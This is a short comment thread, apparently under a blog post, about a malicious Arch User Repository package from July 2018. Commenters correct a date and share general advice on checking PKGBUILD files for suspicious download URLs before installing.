Sad to see. No one s safe on the net I think.
Edit: Since a while.
AnonymousJuly 10, 2018 at 9:18 AM
A small typo - It was on July 7 - not June.
The malicious script was removed within approx. 9 hours
Reply
Replies
LogixJuly 10, 2018 at 10:14 AM
Corrected, thank you!The article offers some advice on what to look for if you’re like me and just kind of do a perfunctory scan without really knowing what exactly to check. If nothing else, focus on the URLs. They will most likely follow a wget or curl command and are the most likely spot to store a malicious script. In this case, the package grabbed a script from Pastebin which should be considered a serious red flag.
That article is rather sensationalist, the ArchWiki clearly advises to check all PKGBUILDs & included files before installing AUR packages:
https://wiki.archlinux.org/index.php/Arch_User_Repository#Build_and_install_the_package